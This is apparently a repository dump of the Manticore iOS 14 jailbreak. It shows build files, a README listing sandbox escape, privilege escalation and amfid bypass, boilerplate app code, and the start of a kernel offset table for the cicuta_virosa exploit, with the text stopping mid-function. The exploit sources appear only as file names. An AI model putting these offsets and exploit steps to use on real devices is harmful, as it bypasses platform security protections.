├── .github
└── workflows
│ └── main.yml
├── .gitignore
├── CONTRIBUTING.md
├── LICENSE
├── Makefile
├── README.md
├── manticore.xcodeproj
├── project.pbxproj
├── project.xcworkspace
│ ├── contents.xcworkspacedata
│ └── xcshareddata
│ │ └── IDEWorkspaceChecks.plist
├── xcshareddata
│ └── xcschemes
│ │ └── manticore.xcscheme
└── xcuserdata
│ ├── a21.xcuserdatad
│ └── xcschemes
│ │ └── xcschememanagement.plist
│ └── rpwnage.xcuserdatad
│ ├── xcdebugger
│ └── Breakpoints_v2.xcbkptlist
│ └── xcschemes
│ └── xcschememanagement.plist
└── manticore
├── AppDelegate.h
├── AppDelegate.m
├── Assets.xcassets
├── AccentColor.colorset
│ └── Contents.json
├── AppIcon.appiconset
│ ├── Contents.json
│ ├── Icon-App-20x20@1x.png
│ ├── Icon-App-20x20@2x.png
│ ├── Icon-App-20x20@3x.png
│ ├── Icon-App-29x29@1x.png
│ ├── Icon-App-29x29@2x.png
│ ├── Icon-App-29x29@3x.png
│ ├── Icon-App-40x40@1x.png
│ ├── Icon-App-40x40@2x.png
│ ├── Icon-App-40x40@3x.png
│ ├── Icon-App-60x60@2x.png
│ ├── Icon-App-60x60@3x.png
│ ├── Icon-App-76x76@1x.png
│ ├── Icon-App-76x76@2x.png
│ ├── Icon-App-83.5x83.5@2x.png
│ └── ItunesArtwork@2x.png
├── Contents.json
└── Package Managers
│ ├── Contents.json
│ ├── Cydia.imageset
│ ├── Contents.json
│ └── Cydia_logo.png
│ ├── Installer.imageset
│ ├── Contents.json
│ └── unnamed.jpeg
│ ├── Sileo.imageset
│ ├── Contents.json
│ └── laMqxYhl.jpeg
│ └── Zebra.imageset
│ ├── Contents.json
│ └── Zebra-Package-Manager-actualizado-a-la-version-11-con-una.jpeg
├── Base.lproj
├── LaunchScreen.storyboard
└── Main.storyboard
├── Exploit
├── KernelOffsets.c
└── cicuta
│ ├── LICENSE
│ ├── README.md
│ ├── cicuta_log.c
│ ├── cicuta_virosa.c
│ ├── descriptors_utils.c
│ ├── exploit_main.c
│ ├── exploit_utilities.c
│ ├── fake_element_spray.c
│ └── voucher_utils.c
├── Info.plist
├── Jailbreak
├── amfid.c
├── jailbreak.mm
├── kernel_utils.mm
├── rootfs.mm
└── utils.mm
├── ViewController.h
├── ViewController.m
├── de.lproj
├── LaunchScreen.strings
└── Main.strings
├── include
├── IOKitUser
│ └── IOKitLib.h
├── exploit
│ └── cicuta
│ │ ├── cicuta_log.h
│ │ ├── cicuta_virosa.h
│ │ ├── descriptors_utils.h
│ │ ├── exploit_main.h
│ │ ├── exploit_utilities.h
│ │ ├── fake_element_spray.h
│ │ └── voucher_utils.h
├── lib
│ ├── snappy
│ │ ├── IOKit.h
│ │ └── snappy.h
│ └── tq
│ │ ├── iosurface.h
│ │ ├── k_offsets.h
│ │ ├── k_utils.h
│ │ ├── kapi.h
│ │ ├── tq_common_p.h
│ │ ├── user_kernel_alloc.h
│ │ └── utils.h
├── manticore
│ ├── amfid.h
│ ├── jailbreak.h
│ ├── kernel_utils.h
│ ├── pac.h
│ ├── rootfs.h
│ └── utils.h
├── offset_finder
│ └── offset_finder.h
├── util
│ ├── alloc.h
│ ├── arm.h
│ ├── error.hpp
│ ├── file.h
│ ├── kutils.h
│ ├── log.hpp
│ ├── mach_vm.h
│ ├── plistutils.h
│ ├── sys_vers.h
│ └── util.h
└── xnu
│ ├── bsd
│ ├── net
│ │ └── route.h
│ └── sys
│ │ ├── kern_control.h
│ │ └── proc_info.h
│ ├── cs_common.h
│ ├── iokit
│ └── IOKit
│ │ ├── IOKitKeys.h
│ │ ├── IOReturn.h
│ │ ├── IOTypes.h
│ │ └── OSMessageNotification.h
│ ├── libsyscall
│ └── wrappers
│ │ └── libproc
│ │ └── libproc.h
│ └── mach_vm.h
├── ja.lproj
├── LaunchScreen.strings
└── Main.strings
├── lib
├── Bazad
│ ├── IOSurface.c
│ └── IOSurface.h
└── pattern_f
│ ├── iosurface.c
│ ├── k_offsets.c
│ ├── k_utils.c
│ ├── kapi_mem.c
│ ├── sys_darwin.c
│ ├── user_kernel_alloc.c
│ └── utils.c
├── main.m
├── manticore.entitlements
├── nl.proj
├── LaunchScreen.strings
└── Main.strings
├── offset_finder
└── offset_finder.mm
├── reton.xcdatamodeld
└── reton.xcdatamodel
│ └── contents
├── util
├── arm.m
├── log.mm
├── plistutils.mm
└── util.mm
└── zh-Hant.lproj
├── LaunchScreen.strings
└── Main.strings
/.github/workflows/main.yml:
--------------------------------------------------------------------------------
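name: Build

on:
  workflow_dispatch:
  push:
    branches: [ amfid2 ]

# Least privilege for the job's GITHUB_TOKEN: this workflow only checks the
# repository out and uploads an artifact, neither of which needs write scopes.
permissions:
  contents: read

jobs:
  build:
    runs-on: macos-latest

    steps:
      # Both actions are referenced by mutable tags (a floating major for
      # checkout, a patch tag for upload-artifact). Pinning each to a full
      # commit SHA removes the tag as a supply-chain tampering point.
      - uses: actions/checkout@v2
      - name: Build
        run: |
          # Unsigned Debug build for the iphoneos SDK (code signing disabled
          # via CODE_SIGNING_REQUIRED / CODE_SIGNING_ALLOWED).
          xcodebuild clean build ONLY_ACTIVE_ARCH=NO PRODUCT_BUNDLE_IDENTIFIER='dev.manticore.manticore' CODE_SIGNING_REQUIRED=NO CODE_SIGNING_ALLOWED="NO" -sdk iphoneos -scheme manticore -configuration Debug -derivedDataPath build
          # Package as an IPA: Payload/<app>, with the Frameworks directory dropped.
          ln -sf build/Build/Products/Debug-iphoneos Payload
          rm -rf Payload/Manticore.app/Frameworks
          zip -r9 Manticore.ipa Payload/Manticore.app

      - name: Upload a Build Artifact
        uses: actions/upload-artifact@v2.2.4
        with:
          name: Manticore.ipa
          path: "Manticore.ipa"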
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | project.pbxproj
2 | *.DS_Store
3 | *.xcuserdatad
4 | build/
5 |
--------------------------------------------------------------------------------
/CONTRIBUTING.md:
--------------------------------------------------------------------------------
1 | # Contributing
2 |
3 | When contributing to this repository, please first discuss the change you wish to make via issue,
4 | email, or any other method with the owners of this repository before making a change.
5 |
6 | Please note that we have a code of conduct; please follow it in all your interactions with the project.
7 |
8 | ## Pull Request Process
9 |
10 | 1. Ensure any install or build dependencies are removed before the end of the layer when doing a
11 | build.
12 | 2. Update the README.md with details of changes to the interface, this includes new environment
13 | variables, exposed ports, useful file locations and container parameters.
14 | 3. Increase the version numbers in any examples files and the README.md to the new version that this
15 | Pull Request would represent. The versioning scheme we use is [SemVer](http://semver.org/).
16 | 4. You may merge the Pull Request in once you have the sign-off of two other developers, or if you
17 | do not have permission to do that, you may request the second reviewer to merge it for you.
18 |
19 | ## Code of Conduct
20 |
21 | ### Our Pledge
22 |
23 | In the interest of fostering an open and welcoming environment, we as
24 | contributors and maintainers pledge to making participation in our project and
25 | our community a harassment-free experience for everyone, regardless of age, body
26 | size, disability, ethnicity, gender identity and expression, level of experience,
27 | nationality, personal appearance, race, religion, or sexual identity and
28 | orientation.
29 |
30 | ### Our Standards
31 |
32 | Examples of behavior that contributes to creating a positive environment
33 | include:
34 |
35 | * Using welcoming and inclusive language
36 | * Being respectful of differing viewpoints and experiences
37 | * Gracefully accepting constructive criticism
38 | * Focusing on what is best for the community
39 | * Showing empathy towards other community members
40 |
41 | Examples of unacceptable behavior by participants include:
42 |
43 | * The use of sexualized language or imagery and unwelcome sexual attention or
44 | advances
45 | * Trolling, insulting/derogatory comments, and personal or political attacks
46 | * Public or private harassment
47 | * Publishing others' private information, such as a physical or electronic
48 | address, without explicit permission
49 | * Other conduct which could reasonably be considered inappropriate in a
50 | professional setting
51 |
52 | ### Our Responsibilities
53 |
54 | Project maintainers are responsible for clarifying the standards of acceptable
55 | behavior and are expected to take appropriate and fair corrective action in
56 | response to any instances of unacceptable behavior.
57 |
58 | Project maintainers have the right and responsibility to remove, edit, or
59 | reject comments, commits, code, wiki edits, issues, and other contributions
60 | that are not aligned to this Code of Conduct, or to ban temporarily or
61 | permanently any contributor for other behaviors that they deem inappropriate,
62 | threatening, offensive, or harmful.
63 |
64 | ### Scope
65 |
66 | This Code of Conduct applies both within project spaces and in public spaces
67 | when an individual is representing the project or its community. Examples of
68 | representing a project or community include using an official project e-mail
69 | address, posting via an official social media account, or acting as an appointed
70 | representative at an online or offline event. Representation of a project may be
71 | further defined and clarified by project maintainers.
72 |
73 | ### Enforcement
74 |
75 | Instances of abusive, harassing, or otherwise unacceptable behavior may be
76 | reported by contacting the project team at <rpwnage@protonmail.com>. All
77 | complaints will be reviewed and investigated and will result in a response that
78 | is deemed necessary and appropriate to the circumstances. The project team is
79 | obligated to maintain confidentiality with regard to the reporter of an incident.
80 | Further details of specific enforcement policies may be posted separately.
81 |
82 | Project maintainers who do not follow or enforce the Code of Conduct in good
83 | faith may face temporary or permanent repercussions as determined by other
84 | members of the project's leadership.
85 |
--------------------------------------------------------------------------------
/Makefile:
--------------------------------------------------------------------------------
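# Bundle identifier handed to xcodebuild. Keep in sync with the CI workflow
# (.github/workflows/main.yml), which runs the same build command.
BUNDLE := dev.manticore.manticore

.PHONY: all clean

# Unsigned Debug build for the iphoneos SDK (code signing disabled), then
# packaged as Manticore.ipa: Payload/<app> with the Frameworks directory dropped.
all: clean
	xcodebuild clean build ONLY_ACTIVE_ARCH=NO PRODUCT_BUNDLE_IDENTIFIER='$(BUNDLE)' CODE_SIGNING_REQUIRED=NO CODE_SIGNING_ALLOWED="NO" -sdk iphoneos -scheme manticore -configuration Debug -derivedDataPath build
	ln -sf build/Build/Products/Debug-iphoneos Payload
	rm -rf Payload/Manticore.app/Frameworks
	zip -r9 Manticore.ipa Payload/Manticore.app

# Remove the derived-data directory, the Payload symlink and the packaged IPA.
clean:
	rm -rf build Payload Manticore.ipa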
13 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Manticore Jailbreak
2 | Manticore Jailbreak is a Free and Open-Source Jailbreak utility developed by the Manticore Team.
3 | Current compatibility: iOS 14.0 through iOS 14.3, using the cicuta_virosa exploit. The tool is a work in progress; expect changes and expansions in the future.
4 |
5 | ## About us
6 | The Manticore Jailbreak is an independent jailbreaking tool for all devices, including A14 and below, running iOS 14.3 down to iOS 14.0.
7 | Our goal is to take back the "most advanced jailbreak" title from unc0ver.
8 |
9 | [Official Manticore Discord Server](https://discord.com/invite/manticore)
10 |
11 | ## Completion
12 | - [x] Exploit Implementation (cicuta_virosa)
13 | - [x] Stable Exploit Primitives
14 | - [x] Sandbox escape
15 | - [x] Privilege escalation
16 | - [x] offset finder/dynamic offsets
17 | - [x] amfid bypass/patch
18 | - [x] amfid -> getting task port address
19 | - [x] rootfs remount
20 | - [ ] `jailbreakd` implementation
21 | - [ ] bootstrap/package manager installation
22 |
23 | ### Credits
24 | * [RPwnage](https://twitter.com/rpwnage)
25 | * [fugiefire](https://twitter.com/fugiefire)
26 | * [PwnedC99](https://twitter.com/pwnedc99)
27 | * [Pattern-F](https://twitter.com/pattern_f_) (Exploit and Stable Primitives)
28 | * [XerusDesign](https://twitter.com/xerusdesign) (UI Design/Concept)
29 | * [ModernPwner](https://twitter.com/ModernPwner) (Original Exploit)
30 |
--------------------------------------------------------------------------------
/manticore.xcodeproj/project.xcworkspace/contents.xcworkspacedata:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/manticore.xcodeproj/project.xcworkspace/xcshareddata/IDEWorkspaceChecks.plist:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | IDEDidComputeMac32BitWarning
6 |
7 |
8 |
9 |
--------------------------------------------------------------------------------
/manticore.xcodeproj/xcshareddata/xcschemes/manticore.xcscheme:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/manticore.xcodeproj/xcuserdata/a21.xcuserdatad/xcschemes/xcschememanagement.plist:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | SchemeUserState
6 |
7 | manticore.xcscheme_^#shared#^_
8 |
9 | orderHint
10 | 0
11 |
12 | reton.xcscheme_^#shared#^_
13 |
14 | orderHint
15 | 0
16 |
17 |
18 |
19 |
20 |
--------------------------------------------------------------------------------
/manticore.xcodeproj/xcuserdata/rpwnage.xcuserdatad/xcdebugger/Breakpoints_v2.xcbkptlist:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/manticore.xcodeproj/xcuserdata/rpwnage.xcuserdatad/xcschemes/xcschememanagement.plist:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | SchemeUserState
6 |
7 | manticore.xcscheme_^#shared#^_
8 |
9 | orderHint
10 | 0
11 |
12 | reton.xcscheme_^#shared#^_
13 |
14 | orderHint
15 | 0
16 |
17 |
18 | SuppressBuildableAutocreation
19 |
20 | 23C704F025DB2EE80078DC37
21 |
22 | primary
23 |
24 |
25 |
26 |
27 |
28 |
--------------------------------------------------------------------------------
/manticore/AppDelegate.h:
--------------------------------------------------------------------------------
1 | //
2 | // AppDelegate.h
3 | // reton
4 | //
5 | // Created by Luca on 15.02.21.
6 | //
7 |
8 |
#import <UIKit/UIKit.h>
10 |
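/// Application delegate: the object UIKit hands lifecycle callbacks to.
/// Adopting UIApplicationDelegate is what makes
/// -application:didFinishLaunchingWithOptions: (implemented in AppDelegate.m)
/// reachable from UIKit.
@interface AppDelegate : UIResponder <UIApplicationDelegate>

/// The app's main window.
@property (strong, nonatomic) UIWindow *window;

@end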
17 |
--------------------------------------------------------------------------------
/manticore/AppDelegate.m:
--------------------------------------------------------------------------------
1 |
2 | #import "AppDelegate.h"
3 |
// Private class extension for AppDelegate; it currently declares nothing.
@interface AppDelegate ()

@end
7 |
@implementation AppDelegate

#pragma mark - Launch

/// Launch hook. No customization is performed; returning YES lets the app
/// finish launching normally.
- (BOOL)application:(UIApplication *)application didFinishLaunchingWithOptions:(NSDictionary *)launchOptions {
    return YES;
}

#pragma mark - Foreground / background transitions

/// Active -> inactive (temporary interruption, or the user leaving the app).
/// Nothing is paused here; the body is empty.
- (void)applicationWillResignActive:(UIApplication *)application {}

/// Entered the background. Nothing is released or persisted; the body is empty.
- (void)applicationDidEnterBackground:(UIApplication *)application {}

/// Background -> foreground. Nothing to undo; the body is empty.
- (void)applicationWillEnterForeground:(UIApplication *)application {}

/// Became active again. No paused work to resume; the body is empty.
- (void)applicationDidBecomeActive:(UIApplication *)application {}

#pragma mark - Termination

/// About to terminate. No state is saved; the body is empty.
- (void)applicationWillTerminate:(UIApplication *)application {}

@end
47 |
--------------------------------------------------------------------------------
/manticore/Assets.xcassets/AccentColor.colorset/Contents.json:
--------------------------------------------------------------------------------
1 | {
2 | "colors" : [
3 | {
4 | "idiom" : "universal"
5 | }
6 | ],
7 | "info" : {
8 | "author" : "xcode",
9 | "version" : 1
10 | }
11 | }
12 |
--------------------------------------------------------------------------------
/manticore/Assets.xcassets/AppIcon.appiconset/Contents.json:
--------------------------------------------------------------------------------
1 | {
2 | "images" : [
3 | {
4 | "filename" : "Icon-App-20x20@2x.png",
5 | "idiom" : "iphone",
6 | "scale" : "2x",
7 | "size" : "20x20"
8 | },
9 | {
10 | "filename" : "Icon-App-20x20@3x.png",
11 | "idiom" : "iphone",
12 | "scale" : "3x",
13 | "size" : "20x20"
14 | },
15 | {
16 | "filename" : "Icon-App-29x29@1x.png",
17 | "idiom" : "iphone",
18 | "scale" : "1x",
19 | "size" : "29x29"
20 | },
21 | {
22 | "filename" : "Icon-App-29x29@2x.png",
23 | "idiom" : "iphone",
24 | "scale" : "2x",
25 | "size" : "29x29"
26 | },
27 | {
28 | "filename" : "Icon-App-29x29@3x.png",
29 | "idiom" : "iphone",
30 | "scale" : "3x",
31 | "size" : "29x29"
32 | },
33 | {
34 | "filename" : "Icon-App-40x40@2x.png",
35 | "idiom" : "iphone",
36 | "scale" : "2x",
37 | "size" : "40x40"
38 | },
39 | {
40 | "filename" : "Icon-App-40x40@3x.png",
41 | "idiom" : "iphone",
42 | "scale" : "3x",
43 | "size" : "40x40"
44 | },
45 | {
46 | "filename" : "Icon-App-60x60@2x.png",
47 | "idiom" : "iphone",
48 | "scale" : "2x",
49 | "size" : "60x60"
50 | },
51 | {
52 | "filename" : "Icon-App-60x60@3x.png",
53 | "idiom" : "iphone",
54 | "scale" : "3x",
55 | "size" : "60x60"
56 | },
57 | {
58 | "filename" : "Icon-App-20x20@1x.png",
59 | "idiom" : "ipad",
60 | "scale" : "1x",
61 | "size" : "20x20"
62 | },
63 | {
64 | "filename" : "Icon-App-20x20@2x.png",
65 | "idiom" : "ipad",
66 | "scale" : "2x",
67 | "size" : "20x20"
68 | },
69 | {
70 | "filename" : "Icon-App-29x29@1x.png",
71 | "idiom" : "ipad",
72 | "scale" : "1x",
73 | "size" : "29x29"
74 | },
75 | {
76 | "filename" : "Icon-App-29x29@2x.png",
77 | "idiom" : "ipad",
78 | "scale" : "2x",
79 | "size" : "29x29"
80 | },
81 | {
82 | "filename" : "Icon-App-40x40@1x.png",
83 | "idiom" : "ipad",
84 | "scale" : "1x",
85 | "size" : "40x40"
86 | },
87 | {
88 | "filename" : "Icon-App-40x40@2x.png",
89 | "idiom" : "ipad",
90 | "scale" : "2x",
91 | "size" : "40x40"
92 | },
93 | {
94 | "filename" : "Icon-App-76x76@1x.png",
95 | "idiom" : "ipad",
96 | "scale" : "1x",
97 | "size" : "76x76"
98 | },
99 | {
100 | "filename" : "Icon-App-76x76@2x.png",
101 | "idiom" : "ipad",
102 | "scale" : "2x",
103 | "size" : "76x76"
104 | },
105 | {
106 | "filename" : "Icon-App-83.5x83.5@2x.png",
107 | "idiom" : "ipad",
108 | "scale" : "2x",
109 | "size" : "83.5x83.5"
110 | },
111 | {
112 | "filename" : "ItunesArtwork@2x.png",
113 | "idiom" : "ios-marketing",
114 | "scale" : "1x",
115 | "size" : "1024x1024"
116 | }
117 | ],
118 | "info" : {
119 | "author" : "xcode",
120 | "version" : 1
121 | }
122 | }
123 |
--------------------------------------------------------------------------------
/manticore/Assets.xcassets/AppIcon.appiconset/Icon-App-20x20@1x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ProjectManticore/Manticore/bd0cf99c7d8a15d5b8d838fdcf7427bce3a9b41a/manticore/Assets.xcassets/AppIcon.appiconset/Icon-App-20x20@1x.png
--------------------------------------------------------------------------------
/manticore/Assets.xcassets/AppIcon.appiconset/Icon-App-20x20@2x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ProjectManticore/Manticore/bd0cf99c7d8a15d5b8d838fdcf7427bce3a9b41a/manticore/Assets.xcassets/AppIcon.appiconset/Icon-App-20x20@2x.png
--------------------------------------------------------------------------------
/manticore/Assets.xcassets/AppIcon.appiconset/Icon-App-20x20@3x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ProjectManticore/Manticore/bd0cf99c7d8a15d5b8d838fdcf7427bce3a9b41a/manticore/Assets.xcassets/AppIcon.appiconset/Icon-App-20x20@3x.png
--------------------------------------------------------------------------------
/manticore/Assets.xcassets/AppIcon.appiconset/Icon-App-29x29@1x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ProjectManticore/Manticore/bd0cf99c7d8a15d5b8d838fdcf7427bce3a9b41a/manticore/Assets.xcassets/AppIcon.appiconset/Icon-App-29x29@1x.png
--------------------------------------------------------------------------------
/manticore/Assets.xcassets/AppIcon.appiconset/Icon-App-29x29@2x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ProjectManticore/Manticore/bd0cf99c7d8a15d5b8d838fdcf7427bce3a9b41a/manticore/Assets.xcassets/AppIcon.appiconset/Icon-App-29x29@2x.png
--------------------------------------------------------------------------------
/manticore/Assets.xcassets/AppIcon.appiconset/Icon-App-29x29@3x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ProjectManticore/Manticore/bd0cf99c7d8a15d5b8d838fdcf7427bce3a9b41a/manticore/Assets.xcassets/AppIcon.appiconset/Icon-App-29x29@3x.png
--------------------------------------------------------------------------------
/manticore/Assets.xcassets/AppIcon.appiconset/Icon-App-40x40@1x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ProjectManticore/Manticore/bd0cf99c7d8a15d5b8d838fdcf7427bce3a9b41a/manticore/Assets.xcassets/AppIcon.appiconset/Icon-App-40x40@1x.png
--------------------------------------------------------------------------------
/manticore/Assets.xcassets/AppIcon.appiconset/Icon-App-40x40@2x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ProjectManticore/Manticore/bd0cf99c7d8a15d5b8d838fdcf7427bce3a9b41a/manticore/Assets.xcassets/AppIcon.appiconset/Icon-App-40x40@2x.png
--------------------------------------------------------------------------------
/manticore/Assets.xcassets/AppIcon.appiconset/Icon-App-40x40@3x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ProjectManticore/Manticore/bd0cf99c7d8a15d5b8d838fdcf7427bce3a9b41a/manticore/Assets.xcassets/AppIcon.appiconset/Icon-App-40x40@3x.png
--------------------------------------------------------------------------------
/manticore/Assets.xcassets/AppIcon.appiconset/Icon-App-60x60@2x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ProjectManticore/Manticore/bd0cf99c7d8a15d5b8d838fdcf7427bce3a9b41a/manticore/Assets.xcassets/AppIcon.appiconset/Icon-App-60x60@2x.png
--------------------------------------------------------------------------------
/manticore/Assets.xcassets/AppIcon.appiconset/Icon-App-60x60@3x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ProjectManticore/Manticore/bd0cf99c7d8a15d5b8d838fdcf7427bce3a9b41a/manticore/Assets.xcassets/AppIcon.appiconset/Icon-App-60x60@3x.png
--------------------------------------------------------------------------------
/manticore/Assets.xcassets/AppIcon.appiconset/Icon-App-76x76@1x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ProjectManticore/Manticore/bd0cf99c7d8a15d5b8d838fdcf7427bce3a9b41a/manticore/Assets.xcassets/AppIcon.appiconset/Icon-App-76x76@1x.png
--------------------------------------------------------------------------------
/manticore/Assets.xcassets/AppIcon.appiconset/Icon-App-76x76@2x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ProjectManticore/Manticore/bd0cf99c7d8a15d5b8d838fdcf7427bce3a9b41a/manticore/Assets.xcassets/AppIcon.appiconset/Icon-App-76x76@2x.png
--------------------------------------------------------------------------------
/manticore/Assets.xcassets/AppIcon.appiconset/Icon-App-83.5x83.5@2x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ProjectManticore/Manticore/bd0cf99c7d8a15d5b8d838fdcf7427bce3a9b41a/manticore/Assets.xcassets/AppIcon.appiconset/Icon-App-83.5x83.5@2x.png
--------------------------------------------------------------------------------
/manticore/Assets.xcassets/AppIcon.appiconset/ItunesArtwork@2x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ProjectManticore/Manticore/bd0cf99c7d8a15d5b8d838fdcf7427bce3a9b41a/manticore/Assets.xcassets/AppIcon.appiconset/ItunesArtwork@2x.png
--------------------------------------------------------------------------------
/manticore/Assets.xcassets/Contents.json:
--------------------------------------------------------------------------------
1 | {
2 | "info" : {
3 | "author" : "xcode",
4 | "version" : 1
5 | }
6 | }
7 |
--------------------------------------------------------------------------------
/manticore/Assets.xcassets/Package Managers/Contents.json:
--------------------------------------------------------------------------------
1 | {
2 | "info" : {
3 | "author" : "xcode",
4 | "version" : 1
5 | }
6 | }
7 |
--------------------------------------------------------------------------------
/manticore/Assets.xcassets/Package Managers/Cydia.imageset/Contents.json:
--------------------------------------------------------------------------------
1 | {
2 | "images" : [
3 | {
4 | "filename" : "Cydia_logo.png",
5 | "idiom" : "universal",
6 | "scale" : "1x"
7 | },
8 | {
9 | "idiom" : "universal",
10 | "scale" : "2x"
11 | },
12 | {
13 | "idiom" : "universal",
14 | "scale" : "3x"
15 | }
16 | ],
17 | "info" : {
18 | "author" : "xcode",
19 | "version" : 1
20 | }
21 | }
22 |
--------------------------------------------------------------------------------
/manticore/Assets.xcassets/Package Managers/Cydia.imageset/Cydia_logo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ProjectManticore/Manticore/bd0cf99c7d8a15d5b8d838fdcf7427bce3a9b41a/manticore/Assets.xcassets/Package Managers/Cydia.imageset/Cydia_logo.png
--------------------------------------------------------------------------------
/manticore/Assets.xcassets/Package Managers/Installer.imageset/Contents.json:
--------------------------------------------------------------------------------
1 | {
2 | "images" : [
3 | {
4 | "filename" : "unnamed.jpeg",
5 | "idiom" : "universal",
6 | "scale" : "1x"
7 | },
8 | {
9 | "idiom" : "universal",
10 | "scale" : "2x"
11 | },
12 | {
13 | "idiom" : "universal",
14 | "scale" : "3x"
15 | }
16 | ],
17 | "info" : {
18 | "author" : "xcode",
19 | "version" : 1
20 | }
21 | }
22 |
--------------------------------------------------------------------------------
/manticore/Assets.xcassets/Package Managers/Installer.imageset/unnamed.jpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ProjectManticore/Manticore/bd0cf99c7d8a15d5b8d838fdcf7427bce3a9b41a/manticore/Assets.xcassets/Package Managers/Installer.imageset/unnamed.jpeg
--------------------------------------------------------------------------------
/manticore/Assets.xcassets/Package Managers/Sileo.imageset/Contents.json:
--------------------------------------------------------------------------------
1 | {
2 | "images" : [
3 | {
4 | "filename" : "laMqxYhl.jpeg",
5 | "idiom" : "universal",
6 | "scale" : "1x"
7 | },
8 | {
9 | "idiom" : "universal",
10 | "scale" : "2x"
11 | },
12 | {
13 | "idiom" : "universal",
14 | "scale" : "3x"
15 | }
16 | ],
17 | "info" : {
18 | "author" : "xcode",
19 | "version" : 1
20 | }
21 | }
22 |
--------------------------------------------------------------------------------
/manticore/Assets.xcassets/Package Managers/Sileo.imageset/laMqxYhl.jpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ProjectManticore/Manticore/bd0cf99c7d8a15d5b8d838fdcf7427bce3a9b41a/manticore/Assets.xcassets/Package Managers/Sileo.imageset/laMqxYhl.jpeg
--------------------------------------------------------------------------------
/manticore/Assets.xcassets/Package Managers/Zebra.imageset/Contents.json:
--------------------------------------------------------------------------------
1 | {
2 | "images" : [
3 | {
4 | "filename" : "Zebra-Package-Manager-actualizado-a-la-version-11-con-una.jpeg",
5 | "idiom" : "universal",
6 | "scale" : "1x"
7 | },
8 | {
9 | "idiom" : "universal",
10 | "scale" : "2x"
11 | },
12 | {
13 | "idiom" : "universal",
14 | "scale" : "3x"
15 | }
16 | ],
17 | "info" : {
18 | "author" : "xcode",
19 | "version" : 1
20 | }
21 | }
22 |
--------------------------------------------------------------------------------
/manticore/Assets.xcassets/Package Managers/Zebra.imageset/Zebra-Package-Manager-actualizado-a-la-version-11-con-una.jpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ProjectManticore/Manticore/bd0cf99c7d8a15d5b8d838fdcf7427bce3a9b41a/manticore/Assets.xcassets/Package Managers/Zebra.imageset/Zebra-Package-Manager-actualizado-a-la-version-11-con-una.jpeg
--------------------------------------------------------------------------------
/manticore/Base.lproj/LaunchScreen.storyboard:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/manticore/Exploit/KernelOffsets.c:
--------------------------------------------------------------------------------
1 | //
2 | // k_offsets.c
3 | // ios-fuzzer
4 | //
5 | // Created by Quote on 2021/1/26.
6 | // Copyright © 2021 Quote. All rights reserved.
7 | //
8 |
9 | #include
10 | #include
11 | #include "Common.h"
12 | #include "Utils.h"
13 | #define Q_INTERNAL
14 | #include "KernelOffsets.h"
15 |
/*
 * Fills in the offset table the per-device functions below share: the static
 * kernelcache base plus the struct sizes (SIZE) and field offsets (OFFSET) the
 * rest of the code resolves through these macros. Each per-device function
 * calls this first and then overrides the entries that differ for its build.
 *
 * SIZE/OFFSET come from KernelOffsets.h, which is not visible here; whether
 * they expand to plain global lvalues or to something with side effects is
 * not established from this file, so the assignment order is left as is.
 */
static void offsets_base_iOS_14_x()
{
    kc_kernel_base = 0xFFFFFFF007004000;

    SIZE(ipc_entry) = 0x18;
    OFFSET(ipc_entry, ie_object) = 0x0;

    OFFSET(ipc_port, ip_bits) = 0x0;
    OFFSET(ipc_port, ip_references) = 0x4;
    OFFSET(ipc_port, ip_kobject) = 0x68;

    OFFSET(ipc_space, is_table_size) = 0x14;
    OFFSET(ipc_space, is_table) = 0x20;

    // These three task fields are the ones the per-device functions override
    // (see offsets_iPhone6s_18A373).
    OFFSET(task, itk_space) = 0x330;
    OFFSET(task, bsd_info) = 0x3a0;
    OFFSET(task, t_flags) = 0x3f4;

    OFFSET(proc, task) = 0x10;
    OFFSET(proc, p_pid) = 0x68;
    OFFSET(proc, p_ucred) = 0xf0;
    OFFSET(proc, p_fd) = 0xf8;

    OFFSET(filedesc, fd_ofiles) = 0x00;
    OFFSET(fileproc, fp_glob) = 0x10;
    OFFSET(fileglob, fg_data) = 0x38;
    OFFSET(pipe, buffer) = 0x10;

    OFFSET(ucred, cr_posix) = 0x18;

    SIZE(posix_cred) = 0x60;

    OFFSET(OSDictionary, count) = 0x14;
    OFFSET(OSDictionary, capacity) = 0x18;
    OFFSET(OSDictionary, dictionary) = 0x20;

    OFFSET(OSString, string) = 0x10;

    OFFSET(IOSurfaceRootUserClient, surfaceClients) = 0x118;
}
56 |
/*
 * iPhone 6s (N71AP), build 18A373: baseline offsets plus this build's
 * kernelcache addresses. The only table that overrides task offsets;
 * itk_space is re-set to the same value the baseline already uses.
 */
static void offsets_iPhone6s_18A373() {
    offsets_base_iOS_14_x();

    kc_kernel_map = 0xFFFFFFF0070AA670;
    kc_kernel_task = 0xFFFFFFF0070A69C8;
    kc_IOSurfaceClient_vt = 0xFFFFFFF006E2EF40;
    kc_IOSurfaceClient_vt_0 = 0xFFFFFFF0060109F8;

